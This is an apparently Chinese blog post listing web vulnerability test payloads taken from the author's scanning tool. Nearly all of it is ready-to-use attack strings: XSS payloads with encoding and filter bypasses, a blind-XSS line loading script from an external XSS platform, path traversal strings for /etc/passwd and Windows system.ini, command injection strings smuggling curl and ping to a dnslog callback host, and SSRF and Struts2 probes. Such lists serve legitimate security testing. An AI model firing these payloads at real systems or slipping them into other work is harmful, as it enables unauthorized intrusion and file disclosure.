WEB漏洞测试payload整理
2016-12-14 17:51
148 查看
常用web漏洞测试的payload整理,把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来,供大家测试时参考。
[反射型xss]
[在html形成]
[在js形成]
[在html属性形成(img)]
[存储型xss]
[通用payload]
测试环境,需要在触发的地方查看payload显示情况
[静态文件读取]
[后缀绕过]
[命令执行漏洞]
[ssrf漏洞]
[strust2命令执行]
[反射型xss]
[在html形成]
"'><script>document.title="[random]";</script> <script>document.title="[random]";</script> <svg onload=document.title="[random]";>
[在js形成]
document.title="[random]";// ;document.title="[random]";// ";document.title="[random]"; ';document.title="[random]"; ");document.title="[random]"; ');document.title="[random]";
[在html属性形成(img)]
888" onload=document.title="[random]" a=" 888' onload=document.title="[random]" a=' 888 onload=document.title="[random]"
[存储型xss]
[通用payload]
测试环境,需要在触发的地方查看payload显示情况
<script>alert(/StoredXssByScriptTag/);</script> "'><script>alert(/StoredXssByScriptTagBypass);</script> [Bypass on Event] [事件型绕过] <img src=1 onerror=alert(/StoredXssByImgTag/)> #一般富文本不会过滤img标签 [Bypass pseudo protocol] [伪协议绕过] <iframe src=javascript:prompt(/StoredXssByIframeTag/);></iframe> <object data=data:text/html;base64,PHNjcmlwdD5wcm9tcHQoL1N0b3JlZFhzc0J5T2JqZWN0VGFnLyk7PC9zY3JpcHQ+></object> [Bypass html5 tag] [html5标签绕过] <svg onload=prompt(/StoredXssBySvgTag/)> <embed src=javascript:alert(/StoredXssByEmbedTag/);> [Bypass html or js encode] [js编码,html编码,十进制编码绕过等] <embed src=javascript:alert(/StoredXssByEmbedTagAndHtmlEncode/);> <video><source onerror=alert(String.fromCharCode(47,83,116,111,114,101,100,88,115,115,98,121,86,105,100,101,111,84,97,103,65,110,100,83,116,114,105,110,103,69,110,99,111,100,101,47))> <script/src=data:text/j\141v\141script,\u0061%6C%65%72%74(/StoredXssbyScriptTagAndJSEncode/)></script> 如果进行盲测可以根据xss平台地址替换相应的js触发代码 "><script src=http://myxss.net/xxxxxx></script>
[静态文件读取]
[常规检测] /../../../../../../../../../../../etc/passwd /../../../../../../../../../../../etc/hosts /../../../../../../../C:/Windows/system.ini [windows] [伪造绕过] /././././././././././././././././././././././././../../../../../../../../etc/passwd /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts
[后缀绕过]
/../../../../../../../../../../../etc/passwd# /../../../../../../../../../../../etc/passwd%00 /../../../../../../../../../../../etc/passwd#.jpg /../../../../../../../../../../../etc/passwd%00.jpg /../../../../../../../../../../../etc/passwd#.html /../../../../../../../../../../../etc/passwd%00.html /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd# /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.jpg /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd#.html /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html
[命令执行漏洞]
[常规检测] ;curl [random].test.dnslog.link | curl [random].test.dnslog.link | ping -n 2 [random].test.dnslog.link [Windows] | ping -c 2 [random].test.dnslog.link [Linux] [绕过检测] ;curl [random].test.dnslog.link# | curl [random].test.dnslog.link# %20|%20curl%20[random].test.dnslog.link %20|%20curl%20[random].test.dnslog.link# %20|%20ping%20-n%202%20[random].test.dnslog.link %20|%20ping%20-c%202%20[random].test.dnslog.link# a=p;b=ing;c=c;d=2;$a$b -$c $d [random].test.dnslog.link a=c;b=url;$a$b [random].test.dnslog.link# ${IFS}|${IFS}curl${IFS}[random].test.dnslog.link ${IFS}|${IFS}ping${IFS}-c${IFS}2${IFS}[random].test.dnslog.link a=p;b=ing;c=c;d=2;$a$b{IFS}-$c{IFS}$d{IFS}[random].test.dnslog.link a=c;b=url;$a$b{IFS}[random].test.dnslog.link#
[ssrf漏洞]
http://[random].test.dnslog.link/
[strust2命令执行]
?redirect:http://[random].test.dnslog.link/%25{3*4}
相关文章推荐
- Web漏洞测试网站整理
- 测试 Web 应用程序是否存在跨站点脚本漏洞
- Web性能测试术语整理
- Windows下基于phpStudy的DVWA web渗透测试漏洞平台搭建
- 常规web渗透测试漏洞描述及修复建议
- 常规web渗透测试漏洞描述及修复建议
- 测试Web应用程序是否存在跨站点脚本漏洞
- WEB漏洞测试(五)——SQL注入
- 小白日记35:kali渗透测试之Web渗透-手动漏洞挖掘(一)-默认安装引发的漏洞
- Kali Linux Web 渗透测试秘籍 第四章 漏洞发现
- WEB漏洞测试(二)——HTML注入 & XSS攻击
- Web性能测试术语整理
- Web入侵安全测试与对策学习笔记之(二)——获取目标信息之其他人留下的漏洞—样例程序的缺陷
- 使用Docker如何搭建Web漏洞测试环境?
- 各种Web漏洞测试平台
- 测试 Web 应用程序是否存在跨站点脚本漏洞
- 测试Web应用程序是否存在跨站点脚本漏洞
- 国产WEB漏洞测试平台—MST
- 渗透测试之web漏洞分析——预习dwva靶机系统
- WEB漏洞测试(四)——SSRF与XXE的超浅显的讨论